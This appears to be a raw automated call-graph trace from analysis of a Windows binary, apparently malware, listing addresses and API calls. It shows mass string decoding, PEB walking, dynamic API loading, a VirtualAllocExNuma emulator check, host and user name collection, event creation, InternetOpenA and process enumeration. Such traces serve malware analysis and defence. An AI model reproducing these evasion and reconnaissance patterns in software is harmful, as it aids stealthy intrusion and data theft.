API calls 86787->86788 86789 402bda 86788->86789 86790 4047e8 3 API calls 86789->86790 86791 402bf0 86790->86791 86792 4047e8 3 API calls 86791->86792 86793 402c07 86792->86793 86794 4047e8 3 API calls 86793->86794 86795 402c1e 86794->86795 86796 4047e8 3 API calls 86795->86796 86797 402c38 86796->86797 86798 4047e8 3 API calls 86797->86798 86799 402c4f 86798->86799 86800 4047e8 3 API calls 86799->86800 86801 402c66 86800->86801 86802 4047e8 3 API calls 86801->86802 86803 402c7d 86802->86803 86804 4047e8 3 API calls 86803->86804 86805 402c93 86804->86805 86806 4047e8 3 API calls 86805->86806 86807 402caa 86806->86807 86808 4047e8 3 API calls 86807->86808 86809 402cc1 86808->86809 86810 4047e8 3 API calls 86809->86810 86811 402cd8 86810->86811 86812 4047e8 3 API calls 86811->86812 86813 402cf2 86812->86813 86814 4047e8 3 API calls 86813->86814 86815 402d09 86814->86815 86816 4047e8 3 API calls 86815->86816 86817 402d20 86816->86817 86818 4047e8 3 API calls 86817->86818 86819 402d37 86818->86819 86820 4047e8 3 API calls 86819->86820 86821 402d4e 86820->86821 86822 4047e8 3 API calls 86821->86822 86823 402d65 86822->86823 86824 4047e8 3 API calls 86823->86824 86825 402d7c 86824->86825 86826 4047e8 3 API calls 86825->86826 86827 402d92 86826->86827 86828 4047e8 3 API calls 86827->86828 86829 402dac 86828->86829 86830 4047e8 3 API calls 86829->86830 86831 402dc3 86830->86831 86832 4047e8 3 API calls 86831->86832 86833 402dda 86832->86833 86834 4047e8 3 API calls 86833->86834 86835 402df1 86834->86835 86836 4047e8 3 API calls 86835->86836 86837 402e07 86836->86837 86838 4047e8 3 API calls 86837->86838 86839 402e1e 86838->86839 86840 4047e8 3 API calls 86839->86840 86841 402e35 86840->86841 86842 4047e8 3 API calls 86841->86842 86843 402e4c 86842->86843 86844 4047e8 3 API calls 86843->86844 86845 402e66 86844->86845 86846 4047e8 3 API calls 86845->86846 86847 402e7d 86846->86847 86848 4047e8 3 API calls 86847->86848 86849 402e94 86848->86849 86850 4047e8 3 API calls 86849->86850 86851 402eaa 86850->86851 86852 4047e8 3 API calls 86851->86852 86853 402ec1 86852->86853 86854 4047e8 3 API calls 86853->86854 86855 402ed8 86854->86855 86856 4047e8 3 API calls 86855->86856 86857 402eec 86856->86857 86858 4047e8 3 API calls 86857->86858 86859 402f03 86858->86859 86860 418643 86859->86860 87360 41859a GetPEB 86860->87360 86862 418649 86863 418844 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 86862->86863 86864 418659 86862->86864 86865 4188a3 GetProcAddress 86863->86865 86866 4188b5 86863->86866 86871 418673 20 API calls 86864->86871 86865->86866 86867 4188e7 86866->86867 86868 4188be GetProcAddress GetProcAddress 86866->86868 86869 4188f0 GetProcAddress 86867->86869 86870 418902 86867->86870 86868->86867 86869->86870 86872 41890b GetProcAddress 86870->86872 86873 41891d 86870->86873 86871->86863 86872->86873 86874 418926 GetProcAddress GetProcAddress 86873->86874 86875 4184c1 86873->86875 86874->86875 86876 4010f0 GetCurrentProcess VirtualAllocExNuma 86875->86876 86877 401111 ExitProcess 86876->86877 86878 401098 VirtualAlloc 86876->86878 86880 4010b8 _memset 86878->86880 86881 4010ec 86880->86881 86882 4010d5 VirtualFree 86880->86882 86883 401284 86881->86883 86882->86881 86884 4012ac _memset 86883->86884 86885 4012bb 13 API calls 86884->86885 87361 410c85 GetProcessHeap RtlAllocateHeap GetComputerNameA 86885->87361 86887 4013e9 86890 41d016 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 86887->86890 86892 4013f4 86890->86892 86891 4013b9 86891->86887 86893 4013e2 ExitProcess 86891->86893 86892->86735 86894->86740 86895->86748 87364 4014ad GetPEB 86896->87364 86899 4014ad 2 API calls 86900 401516 86899->86900 86901 4014ad 2 API calls 86900->86901 86918 4015a1 86900->86918 86902 401529 86901->86902 86903 4014ad 2 API calls 86902->86903 86902->86918 86904 401538 86903->86904 86905 4014ad 2 API calls 86904->86905 86904->86918 86906 401547 86905->86906 86907 4014ad 2 API calls 86906->86907 86906->86918 86908 401556 86907->86908 86909 4014ad 2 API calls 86908->86909 86908->86918 86910 401565 86909->86910 86911 4014ad 2 API calls 86910->86911 86910->86918 86912 401574 86911->86912 86913 4014ad 2 API calls 86912->86913 86912->86918 86914 401583 86913->86914 86915 4014ad 2 API calls 86914->86915 86914->86918 86916 401592 86915->86916 86917 4014ad 2 API calls 86916->86917 86916->86918 86917->86918 86918->86757 86920 4016a4 wsprintfW 86919->86920 86930 4017f7 86919->86930 86921 4016d0 CreateFileW 86920->86921 86923 4016fb GetProcessHeap RtlAllocateHeap _time64 srand rand 86921->86923 86921->86930 86922 41d016 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 86924 401807 86922->86924 86928 401754 _memset 86923->86928 86924->86766 86925 401733 WriteFile 86925->86928 86925->86930 86926 401768 CloseHandle CreateFileW 86927 40179e ReadFile 86926->86927 86926->86930 86927->86928 86927->86930 86928->86925 86928->86926 86929 4017c3 GetProcessHeap RtlFreeHeap CloseHandle 86928->86929 86928->86930 86929->86921 86929->86930 86930->86922 86932 417051 86931->86932 87368 4104e7 86932->87368 86936 417080 87373 410609 lstrlenA 86936->87373 86939 410609 3 API calls 86940 4170a5 86939->86940 86941 410609 3 API calls 86940->86941 86942 4170ae 86941->86942 87377 41058d 86942->87377 86944 4170ba 86945 4170e3 OpenEventA 86944->86945 86946 4170f6 CreateEventA 86945->86946 86947 4170dc CloseHandle 86945->86947 86948 4104e7 lstrcpyA 86946->86948 86947->86945 86949 41711e 86948->86949 87381 410549 lstrlenA 86949->87381 86952 410549 2 API calls 86953 417185 86952->86953 87385 402f12 86953->87385 86956 418950 121 API calls 86957 4172ca 86956->86957 86958 4104e7 lstrcpyA 86957->86958 87162 41757f 86957->87162 86960 4172e5 86958->86960 86962 410609 3 API calls 86960->86962 86965 4172f7 86962->86965 86963 41058d lstrcpyA 86964 4175af 86963->86964 86968 4104e7 lstrcpyA 86964->86968 86966 41058d lstrcpyA 86965->86966 86967 417300 86966->86967 86971 410609 3 API calls 86967->86971 86969 4175c6 86968->86969 86970 410609 3 API calls 86969->86970 86973 4175d9 86970->86973 86972 41731b 86971->86972 86974 41058d lstrcpyA 86972->86974 87957 4105c7 86973->87957 86976 417324 86974->86976 86979 410609 3 API calls 86976->86979 86978 41058d lstrcpyA 86982 4175f2 86978->86982 86980 41733f 86979->86980 86981 41058d lstrcpyA 86980->86981 86983 417348 86981->86983 86984 417604 CreateDirectoryA 86982->86984 86988 410609 3 API calls 86983->86988 87961 401cfd 86984->87961 86990 417363 86988->86990 86989 41762e 88045 41824d 86989->88045 86992 41058d lstrcpyA 86990->86992 86994 41736c 86992->86994 86993 41763f 86996 41058d lstrcpyA 86993->86996 86995 410609 3 API calls 86994->86995 86997 417387 86995->86997 86998 417656 86996->86998 86999 41058d lstrcpyA 86997->86999 87000 41058d lstrcpyA 86998->87000 87001 417390 86999->87001 87002 417666 87000->87002 87005 410609 3 API calls 87001->87005 88052 410519 87002->88052 87007 4173ab 87005->87007 87006 410609 3 API calls 87008 417685 87006->87008 87009 41058d lstrcpyA 87007->87009 87010 41058d lstrcpyA 87008->87010 87012 4173b4 87009->87012 87011 41768e 87010->87011 87013 4105c7 2 API calls 87011->87013 87014 410609 3 API calls 87012->87014 87015 4176ab 87013->87015 87016 4173cf 87014->87016 87017 41058d lstrcpyA 87015->87017 87018 41058d lstrcpyA 87016->87018 87020 4176b4 87017->87020 87019 4173d8 87018->87019 87022 410609 3 API calls 87019->87022 87021 4176bd InternetOpenA InternetOpenA 87020->87021 87023 410519 lstrcpyA 87021->87023 87024 4173f3 87022->87024 87025 417707 87023->87025 87026 41058d lstrcpyA 87024->87026 87027 4104e7 lstrcpyA 87025->87027 87028 4173fc 87026->87028 87029 417716 87027->87029 87032 410609 3 API calls 87028->87032 88056 4109a2 GetWindowsDirectoryA 87029->88056 87035 417417 87032->87035 87033 410519 lstrcpyA 87034 417731 87033->87034 88074 404b2e 87034->88074 87037 41058d lstrcpyA 87035->87037 87039 417420 87037->87039 87042 410609 3 API calls 87039->87042 87041 417744 87044 4104e7 lstrcpyA 87041->87044 87043 41743b 87042->87043 87045 41058d lstrcpyA 87043->87045 87046 417779 87044->87046 87047 417444 87045->87047 87048 401cfd lstrcpyA 87046->87048 87051 410609 3 API calls 87047->87051 87049 41778a 87048->87049 88224 405f39 87049->88224 87053 41745f 87051->87053 87055 41058d lstrcpyA 87053->87055 87057 417468 87055->87057 87056 4177a2 87058 4104e7 lstrcpyA 87056->87058 87062 410609 3 API calls 87057->87062 87059 4177b6 87058->87059 87060 401cfd lstrcpyA 87059->87060 87061 4177c0 87060->87061 87063 405f39 43 API calls 87061->87063 87064 417483 87062->87064 87065 4177cc 87063->87065 87066 41058d lstrcpyA 87064->87066 88397 413259 strtok_s 87065->88397 87068 41748c 87066->87068 87071 410609 3 API calls 87068->87071 87069 4177df 87070 4104e7 lstrcpyA 87069->87070 87072 4177f2 87070->87072 87073 4174a7 87071->87073 87074 401cfd lstrcpyA 87072->87074 87075 41058d lstrcpyA 87073->87075 87076 417803 87074->87076 87077 4174b0 87075->87077 87078 405f39 43 API calls 87076->87078 87081 410609 3 API calls 87077->87081 87079 41780f 87078->87079 88406 413390 strtok_s 87079->88406 87083 4174cb 87081->87083 87082 417822 87084 401cfd lstrcpyA 87082->87084 87086 41058d lstrcpyA 87083->87086 87085 417833 87084->87085 88413 413b86 87085->88413 87088 4174d4 87086->87088 87092 410609 3 API calls 87088->87092 87094 4174ef 87092->87094 87096 41058d lstrcpyA 87094->87096 87097 4174f8 87096->87097 87101 410609 3 API calls 87097->87101 87103 417513 87101->87103 87105 41058d lstrcpyA 87103->87105 87107 41751c 87105->87107 87113 410609 3 API calls 87107->87113 87117 417537 87113->87117 87121 41058d lstrcpyA 87117->87121 87126 417540 87121->87126 87137 410609 3 API calls 87126->87137 87138 41755b 87137->87138 87142 41058d lstrcpyA 87138->87142 87146 417564 87142->87146 87940 41257f 87146->87940 87949 411c4a 87162->87949 87169 41cc6c 10 API calls 87169->87162 87357 402b7c 87356->87357 87358 40480f 87356->87358 87357->86782 87359 404818 lstrlenA 87358->87359 87359->87357 87359->87359 87360->86862 87362 401385 87361->87362 87362->86887 87363 410c53 GetProcessHeap HeapAlloc GetUserNameA 87362->87363 87363->86891 87367 4014e9 87364->87367 87365 4014d9 lstrcmpiW 87366 4014ef 87365->87366 87365->87367 87366->86899 87366->86918 87367->87365 87367->87366 87369 4104f2 87368->87369 87370 410513 87369->87370 87371 410509 lstrcpyA 87369->87371 87372 410c53 GetProcessHeap HeapAlloc GetUserNameA 87370->87372 87371->87370 87372->86936 87375 410630 87373->87375 87374 410656 87374->86939 87375->87374 87376 410643 lstrcpyA lstrcatA 87375->87376 87376->87374 87379 41059c 87377->87379 87378 4105c3 87378->86944 87379->87378 87380 4105bb lstrcpyA 87379->87380 87380->87378 87383 41055e 87381->87383 87382 410587 87382->86952 87383->87382 87384 41057d lstrcpyA 87383->87384 87384->87382 87386 4047e8 3 API calls 87385->87386 87387 402f27 87386->87387 87388 4047e8 3 API calls 87387->87388 87389 402f3e 87388->87389 87390 4047e8 3 API calls 87389->87390 87391 402f55 87390->87391 87392 4047e8 3 API calls 87391->87392 87393 402f6c 87392->87393 87394 4047e8 3 API calls 87393->87394 87395 402f85 87394->87395 87396 4047e8 3 API calls 87395->87396 87397 402f9c 87396->87397 87398 4047e8 3 API calls 87397->87398 87399 402fb3 87398->87399 87400 4047e8 3 API calls 87399->87400 87401 402fca 87400->87401 87402 4047e8 3 API calls 87401->87402 87403 402fe4 87402->87403 87404 4047e8 3 API calls 87403->87404 87405 402ffb 87404->87405 87406 4047e8 3 API calls 87405->87406 87407 403011 87406->87407 87408 4047e8 3 API calls 87407->87408 87409 403028 87408->87409 87410 4047e8 3 API calls 87409->87410 87411 40303f 87410->87411 87412 4047e8 3 API calls 87411->87412 87413 403056 87412->87413 87414 4047e8 3 API calls 87413->87414 87415 40306d 87414->87415 87416 4047e8 3 API calls 87415->87416 87417 403084 87416->87417 87418 4047e8 3 API calls 87417->87418 87419 40309b 87418->87419 87420 4047e8 3 API calls 87419->87420 87421 4030b2 87420->87421 87422 4047e8 3 API calls 87421->87422 87423 4030c9 87422->87423 87424 4047e8 3 API calls 87423->87424 87425 4030df 87424->87425 87426 4047e8 3 API calls 87425->87426 87427 4030f6 87426->87427 87428 4047e8 3 API calls 87427->87428 87429 40310f 87428->87429 87430 4047e8 3 API calls 87429->87430 87431 403123 87430->87431 87432 4047e8 3 API calls 87431->87432 87433 40313a 87432->87433 87434 4047e8 3 API calls 87433->87434 87435 403154 87434->87435 87436 4047e8 3 API calls 87435->87436 87437 40316b 87436->87437 87438 4047e8 3 API calls 87437->87438 87439 403182 87438->87439 87440 4047e8 3 API calls 87439->87440 87441 403199 87440->87441 87442 4047e8 3 API calls 87441->87442 87443 4031af 87442->87443 87444 4047e8 3 API calls 87443->87444 87445 4031c5 87444->87445 87446 4047e8 3 API calls 87445->87446 87447 4031dc 87446->87447 87448 4047e8 3 API calls 87447->87448 87449 4031f2 87448->87449 87450 4047e8 3 API calls 87449->87450 87451 40320c 87450->87451 87452 4047e8 3 API calls 87451->87452 87453 403223 87452->87453 87454 4047e8 3 API calls 87453->87454 87455 40323a 87454->87455 87456 4047e8 3 API calls 87455->87456 87457 403250 87456->87457 87458 4047e8 3 API calls 87457->87458 87459 403267 87458->87459 87460 4047e8 3 API calls 87459->87460 87461 40327e 87460->87461 87462 4047e8 3 API calls 87461->87462 87463 403295 87462->87463 87464 4047e8 3 API calls 87463->87464 87465 4032ab 87464->87465 87466 4047e8 3 API calls 87465->87466 87467 4032c2 87466->87467 87468 4047e8 3 API calls 87467->87468 87469 4032d9 87468->87469 87470 4047e8 3 API calls 87469->87470 87471 4032f0 87470->87471 87472 4047e8 3 API calls 87471->87472 87473 403306 87472->87473 87474 4047e8 3 API calls 87473->87474 87475 40331c 87474->87475 87476 4047e8 3 API calls 87475->87476 87477 403333 87476->87477 87478 4047e8 3 API calls 87477->87478 87479 403349 87478->87479 87480 4047e8 3 API calls 87479->87480 87481 40335d 87480->87481 87482 4047e8 3 API calls 87481->87482 87483 403374 87482->87483 87484 4047e8 3 API calls 87483->87484 87485 40338a 87484->87485 87486 4047e8 3 API calls 87485->87486 87487 4033a1 87486->87487 87488 4047e8 3 API calls 87487->87488 87489 4033b8 87488->87489 87490 4047e8 3 API calls 87489->87490 87491 4033cf 87490->87491 87492 4047e8 3 API calls 87491->87492 87493 4033e6 87492->87493 87494 4047e8 3 API calls 87493->87494 87495 4033fd 87494->87495 87496 4047e8 3 API calls 87495->87496 87497 403414 87496->87497 87498 4047e8 3 API calls 87497->87498 87499 40342e 87498->87499 87500 4047e8 3 API calls 87499->87500 87501 403445 87500->87501 87502 4047e8 3 API calls 87501->87502 87503 40345c 87502->87503 87504 4047e8 3 API calls 87503->87504 87505 403473 87504->87505 87506 4047e8 3 API calls 87505->87506 87507 40348a 87506->87507 87508 4047e8 3 API calls 87507->87508 87509 4034a1 87508->87509 87510 4047e8 3 API calls 87509->87510 87511 4034b8 87510->87511 87512 4047e8 3 API calls 87511->87512 87513 4034cf 87512->87513 87514 4047e8 3 API calls 87513->87514 87515 4034e9 87514->87515 87516 4047e8 3 API calls 87515->87516 87517 403500 87516->87517 87518 4047e8 3 API calls 87517->87518 87519 403517 87518->87519 87520 4047e8 3 API calls 87519->87520 87521 40352e 87520->87521 87522 4047e8 3 API calls 87521->87522 87523 403545 87522->87523 87524 4047e8 3 API calls 87523->87524 87525 40355c 87524->87525 87526 4047e8 3 API calls 87525->87526 87527 403573 87526->87527 87528 4047e8 3 API calls 87527->87528 87529 40358a 87528->87529 87530 4047e8 3 API calls 87529->87530 87531 4035a4 87530->87531 87532 4047e8 3 API calls 87531->87532 87533 4035bb 87532->87533 87534 4047e8 3 API calls 87533->87534 87535 4035d2 87534->87535 87536 4047e8 3 API calls 87535->87536 87537 4035e9 87536->87537 87538 4047e8 3 API calls 87537->87538 87539 403600 87538->87539 87540 4047e8 3 API calls 87539->87540 87541 403617 87540->87541 87542 4047e8 3 API calls 87541->87542 87543 40362d 87542->87543 87544 4047e8 3 API calls 87543->87544 87545 403643 87544->87545 87546 4047e8 3 API calls 87545->87546 87547 40365d 87546->87547 87548 4047e8 3 API calls 87547->87548 87549 403674 87548->87549 87550 4047e8 3 API calls 87549->87550 87551 40368b 87550->87551 87552 4047e8 3 API calls 87551->87552 87553 4036a1 87552->87553 87554 4047e8 3 API calls 87553->87554 87555 4036b8 87554->87555 87556 4047e8 3 API calls 87555->87556 87557 4036cf 87556->87557 87558 4047e8 3 API calls 87557->87558 87559 4036e3 87558->87559 87560 4047e8 3 API calls 87559->87560 87561 4036f9 87560->87561 87562 4047e8 3 API calls 87561->87562 87563 403713 87562->87563 87564 4047e8 3 API calls 87563->87564 87565 40372a 87564->87565 87566 4047e8 3 API calls 87565->87566 87567 403741 87566->87567 87568 4047e8 3 API calls 87567->87568 87569 403758 87568->87569 87570 4047e8 3 API calls 87569->87570 87571 40376f 87570->87571 87572 4047e8 3 API calls 87571->87572 87573 403786 87572->87573 87574 4047e8 3 API calls 87573->87574 87575 40379a 87574->87575 87576 4047e8 3 API calls 87575->87576 87577 4037b1 87576->87577 87578 4047e8 3 API calls 87577->87578 87579 4037cb 87578->87579 87580 4047e8 3 API calls 87579->87580 87581 4037e2 87580->87581 87582 4047e8 3 API calls 87581->87582 87583 4037f6 87582->87583 87584 4047e8 3 API calls 87583->87584 87585 40380a 87584->87585 87586 4047e8 3 API calls 87585->87586 87587 403821 87586->87587 87588 4047e8 3 API calls 87587->87588 87589 403838 87588->87589 87590 4047e8 3 API calls 87589->87590 87591 40384f 87590->87591 87592 4047e8 3 API calls 87591->87592 87593 403866 87592->87593 87594 4047e8 3 API calls 87593->87594 87595 403880 87594->87595 87596 4047e8 3 API calls 87595->87596 87597 403897 87596->87597 87598 4047e8 3 API calls 87597->87598 87599 4038ae 87598->87599 87600 4047e8 3 API calls 87599->87600 87601 4038c5 87600->87601 87602 4047e8 3 API calls 87601->87602 87603 4038db 87602->87603 87604 4047e8 3 API calls 87603->87604 87605 4038f2 87604->87605 87606 4047e8 3 API calls 87605->87606 87607 403906 87606->87607 87608 4047e8 3 API calls 87607->87608 87609 40391d 87608->87609 87610 4047e8 3 API calls 87609->87610 87611 403937 87610->87611 87612 4047e8 3 API calls 87611->87612 87613 40394e 87612->87613 87614 4047e8 3 API calls 87613->87614 87615 403965 87614->87615 87616 4047e8 3 API calls 87615->87616 87617 40397c 87616->87617 87618 4047e8 3 API calls 87617->87618 87619 403993 87618->87619 87620 4047e8 3 API calls 87619->87620 87621 4039aa 87620->87621 87622 4047e8 3 API calls 87621->87622 87623 4039c1 87622->87623 87624 4047e8 3 API calls 87623->87624 87625 4039d8 87624->87625 87626 4047e8 3 API calls 87625->87626 87627 4039f2 87626->87627 87628 4047e8 3 API calls 87627->87628 87629 403a09 87628->87629 87630 4047e8 3 API calls 87629->87630 87631 403a20 87630->87631 87632 4047e8 3 API calls 87631->87632 87633 403a37 87632->87633 87634 4047e8 3 API calls 87633->87634 87635 403a4e 87634->87635 87636 4047e8 3 API calls 87635->87636 87637 403a65 87636->87637 87638 4047e8 3 API calls 87637->87638 87639 403a7c 87638->87639 87640 4047e8 3 API calls 87639->87640 87641 403a90 87640->87641 87642 4047e8 3 API calls 87641->87642 87643 403aaa 87642->87643 87644 4047e8 3 API calls 87643->87644 87645 403ac1 87644->87645 87646 4047e8 3 API calls 87645->87646 87647 403ad7 87646->87647 87648 4047e8 3 API calls 87647->87648 87649 403aee 87648->87649 87650 4047e8 3 API calls 87649->87650 87651 403b05 87650->87651 87652 4047e8 3 API calls 87651->87652 87653 403b1c 87652->87653 87654 4047e8 3 API calls 87653->87654 87655 403b33 87654->87655 87656 4047e8 3 API calls 87655->87656 87657 403b4a 87656->87657 87658 4047e8 3 API calls 87657->87658 87659 403b61 87658->87659 87660 4047e8 3 API calls 87659->87660 87661 403b75 87660->87661 87662 4047e8 3 API calls 87661->87662 87663 403b8c 87662->87663 87664 4047e8 3 API calls 87663->87664 87665 403ba3 87664->87665 87666 4047e8 3 API calls 87665->87666 87667 403bba 87666->87667 87668 4047e8 3 API calls 87667->87668 87669 403bd1 87668->87669 87670 4047e8 3 API calls 87669->87670 87671 403be8 87670->87671 87672 4047e8 3 API calls 87671->87672 87673 403bff 87672->87673 87674 4047e8 3 API calls 87673->87674 87675 403c19 87674->87675 87676 4047e8 3 API calls 87675->87676 87677 403c30 87676->87677 87678 4047e8 3 API calls 87677->87678 87679 403c47 87678->87679 87680 4047e8 3 API calls 87679->87680 87681 403c5e 87680->87681 87682 4047e8 3 API calls 87681->87682 87683 403c75 87682->87683 87684 4047e8 3 API calls 87683->87684 87685 403c8c 87684->87685 87686 4047e8 3 API calls 87685->87686 87687 403ca3 87686->87687 87688 4047e8 3 API calls 87687->87688 87689 403cb7 87688->87689 87690 4047e8 3 API calls 87689->87690 87691 403cd1 87690->87691 87692 4047e8 3 API calls 87691->87692 87693 403ce8 87692->87693 87694 4047e8 3 API calls 87693->87694 87695 403cff 87694->87695 87696 4047e8 3 API calls 87695->87696 87697 403d16 87696->87697 87698 4047e8 3 API calls 87697->87698 87699 403d2c 87698->87699 87700 4047e8 3 API calls 87699->87700 87701 403d43 87700->87701 87702 4047e8 3 API calls 87701->87702 87703 403d57 87702->87703 87704 4047e8 3 API calls 87703->87704 87705 403d6e 87704->87705 87706 4047e8 3 API calls 87705->87706 87707 403d85 87706->87707 87708 4047e8 3 API calls 87707->87708 87709 403d9c 87708->87709 87710 4047e8 3 API calls 87709->87710 87711 403db3 87710->87711 87712 4047e8 3 API calls 87711->87712 87713 403dca 87712->87713 87714 4047e8 3 API calls 87713->87714 87715 403de1 87714->87715 87716 4047e8 3 API calls 87715->87716 87717 403df8 87716->87717 87718 4047e8 3 API calls 87717->87718 87719 403e0f 87718->87719 87720 4047e8 3 API calls 87719->87720 87721 403e26 87720->87721 87722 4047e8 3 API calls 87721->87722 87723 403e40 87722->87723 87724 4047e8 3 API calls 87723->87724 87725 403e57 87724->87725 87726 4047e8 3 API calls 87725->87726 87727 403e6e 87726->87727 87728 4047e8 3 API calls 87727->87728 87729 403e84 87728->87729 87730 4047e8 3 API calls 87729->87730 87731 403e9b 87730->87731 87732 4047e8 3 API calls 87731->87732 87733 403eb2 87732->87733 87734 4047e8 3 API calls 87733->87734 87735 403ec9 87734->87735 87736 4047e8 3 API calls 87735->87736 87737 403ee0 87736->87737 87738 4047e8 3 API calls 87737->87738 87739 403efa 87738->87739 87740 4047e8 3 API calls 87739->87740 87741 403f10 87740->87741 87742 4047e8 3 API calls 87741->87742 87743 403f27 87742->87743 87744 4047e8 3 API calls 87743->87744 87745 403f3e 87744->87745 87746 4047e8 3 API calls 87745->87746 87747 403f55 87746->87747 87748 4047e8 3 API calls 87747->87748 87749 403f6c 87748->87749 87750 4047e8 3 API calls 87749->87750 87751 403f80 87750->87751 87752 4047e8 3 API calls 87751->87752 87753 403f97 87752->87753 87754 4047e8 3 API calls 87753->87754 87755 403fb1 87754->87755 87756 4047e8 3 API calls 87755->87756 87757 403fc7 87756->87757 87758 4047e8 3 API calls 87757->87758 87759 403fde 87758->87759 87760 4047e8 3 API calls 87759->87760 87761 403ff2 87760->87761 87762 4047e8 3 API calls 87761->87762 87763 404009 87762->87763 87764 4047e8 3 API calls 87763->87764 87765 404020 87764->87765 87766 4047e8 3 API calls 87765->87766 87767 404037 87766->87767 87768 4047e8 3 API calls 87767->87768 87769 40404e 87768->87769 87770 4047e8 3 API calls 87769->87770 87771 404067 87770->87771 87772 4047e8 3 API calls 87771->87772 87773 40407e 87772->87773 87774 4047e8 3 API calls 87773->87774 87775 404094 87774->87775 87776 4047e8 3 API calls 87775->87776 87777 4040a8 87776->87777 87778 4047e8 3 API calls 87777->87778 87779 4040bf 87778->87779 87780 4047e8 3 API calls 87779->87780 87781 4040d6 87780->87781 87782 4047e8 3 API calls 87781->87782 87783 4040ed 87782->87783 87784 4047e8 3 API calls 87783->87784 87785 404104 87784->87785 87786 4047e8 3 API calls 87785->87786 87787 40411e 87786->87787 87788 4047e8 3 API calls 87787->87788 87789 404135 87788->87789 87790 4047e8 3 API calls 87789->87790 87791 40414c 87790->87791 87792 4047e8 3 API calls 87791->87792 87793 404163 87792->87793 87794 4047e8 3 API calls 87793->87794 87795 404179 87794->87795 87796 4047e8 3 API calls 87795->87796 87797 40418d 87796->87797 87798 4047e8 3 API calls 87797->87798 87799 4041a1 87798->87799 87800 4047e8 3 API calls 87799->87800 87801 4041b8 87800->87801 87802 4047e8 3 API calls 87801->87802 87803 4041d2 87802->87803 87804 4047e8 3 API calls 87803->87804 87805 4041e8 87804->87805 87806 4047e8 3 API calls 87805->87806 87807 4041ff 87806->87807 87808 4047e8 3 API calls 87807->87808 87809 404216 87808->87809 87810 4047e8 3 API calls 87809->87810 87811 40422d 87810->87811 87812 4047e8 3 API calls 87811->87812 87813 404244 87812->87813 87814 4047e8 3 API calls 87813->87814 87815 404258 87814->87815 87816 4047e8 3 API calls 87815->87816 87817 40426e 87816->87817 87818 4047e8 3 API calls 87817->87818 87819 404288 87818->87819 87820 4047e8 3 API calls 87819->87820 87821 40429f 87820->87821 87822 4047e8 3 API calls 87821->87822 87823 4042b6 87822->87823 87824 4047e8 3 API calls 87823->87824 87825 4042cc 87824->87825 87826 4047e8 3 API calls 87825->87826 87827 4042e3 87826->87827 87828 4047e8 3 API calls 87827->87828 87829 4042fa 87828->87829 87830 4047e8 3 API calls 87829->87830 87831 404311 87830->87831 87832 4047e8 3 API calls 87831->87832 87833 404325 87832->87833 87834 4047e8 3 API calls 87833->87834 87835 40433c 87834->87835 87836 4047e8 3 API calls 87835->87836 87837 404353 87836->87837 87838 4047e8 3 API calls 87837->87838 87839 40436a 87838->87839 87840 4047e8 3 API calls 87839->87840 87841 404381 87840->87841 87842 4047e8 3 API calls 87841->87842 87843 404395 87842->87843 87844 4047e8 3 API calls 87843->87844 87845 4043ac 87844->87845 87846 4047e8 3 API calls 87845->87846 87847 4043c3 87846->87847 87848 4047e8 3 API calls 87847->87848 87849 4043da 87848->87849 87850 4047e8 3 API calls 87849->87850 87851 4043f1 87850->87851 87852 4047e8 3 API calls 87851->87852 87853 404408 87852->87853 87854 4047e8 3 API calls 87853->87854 87855 40441c 87854->87855 87856 4047e8 3 API calls 87855->87856 87857 404433 87856->87857 87858 4047e8 3 API calls 87857->87858 87859 40444a 87858->87859 87860 4047e8 3 API calls 87859->87860 87861 40445e 87860->87861 87862 4047e8 3 API calls 87861->87862 87863 404472 87862->87863 87864 4047e8 3 API calls 87863->87864 87865 404486 87864->87865 87866 4047e8 3 API calls 87865->87866 87867 4044a0 87866->87867 87868 4047e8 3 API calls 87867->87868 87869 4044b7 87868->87869 87870 4047e8 3 API calls 87869->87870 87871 4044cd 87870->87871 87872 4047e8 3 API calls 87871->87872 87873 4044e4 87872->87873 87874 4047e8 3 API calls 87873->87874 87875 4044fa 87874->87875 87876 4047e8 3 API calls 87875->87876 87877 404511 87876->87877 87878 4047e8 3 API calls 87877->87878 87879 404528 87878->87879 87880 4047e8 3 API calls 87879->87880 87881 40453e 87880->87881 87882 4047e8 3 API calls 87881->87882 87883 404558 87882->87883 87884 4047e8 3 API calls 87883->87884 87885 40456f 87884->87885 87886 4047e8 3 API calls 87885->87886 87887 404586 87886->87887 87888 4047e8 3 API calls 87887->87888 87889 40459d 87888->87889 87890 4047e8 3 API calls 87889->87890 87891 4045b4 87890->87891 87892 4047e8 3 API calls 87891->87892 87893 4045cb 87892->87893 87894 4047e8 3 API calls 87893->87894 87895 4045e2 87894->87895 87896 4047e8 3 API calls 87895->87896 87897 4045f9 87896->87897 87898 4047e8 3 API calls 87897->87898 87899 404612 87898->87899 87900 4047e8 3 API calls 87899->87900 87901 404629 87900->87901 87902 4047e8 3 API calls 87901->87902 87903 404642 87902->87903 87904 4047e8 3 API calls 87903->87904 87905 404656 87904->87905 87906 4047e8 3 API calls 87905->87906 87907 40466d 87906->87907 87908 4047e8 3 API calls 87907->87908 87909 404684 87908->87909 87910 4047e8 3 API calls 87909->87910 87911 40469b 87910->87911 87912 4047e8 3 API calls 87911->87912 87913 4046b2 87912->87913 87914 4047e8 3 API calls 87913->87914 87915 4046cc 87914->87915 87916 4047e8 3 API calls 87915->87916 87917 4046e3 87916->87917 87918 4047e8 3 API calls 87917->87918 87919 4046f9 87918->87919 87920 4047e8 3 API calls 87919->87920 87921 404710 87920->87921 87922 4047e8 3 API calls 87921->87922 87923 404727 87922->87923 87924 4047e8 3 API calls 87923->87924 87925 40473d 87924->87925 87926 4047e8 3 API calls 87925->87926 87927 404754 87926->87927 87928 4047e8 3 API calls 87927->87928 87929 404768 87928->87929 87930 4047e8 3 API calls 87929->87930 87931 404781 87930->87931 87932 4047e8 3 API calls 87931->87932 87933 404797 87932->87933 87934 4047e8 3 API calls 87933->87934 87935 4047ae 87934->87935 87936 4047e8 3 API calls 87935->87936 87937 4047c5 87936->87937 87938 4047e8 3 API calls 87937->87938 87939 4047dc 87938->87939 87939->86956 89259 42f109 87940->89259 87942 41258e CreateToolhelp32Snapshot Process32First 87943 4125c2 Process32Next 87942->87943 87944 4125ef CloseHandle 87942->87944 87943->87944 87945 4125d4 StrCmpCA 87943->87945 89260 42f165 87944->89260 87945->87943 87947 4125e6 87945->87947 87947->87943 87950 4104e7 lstrcpyA 87949->87950 87951 411c67 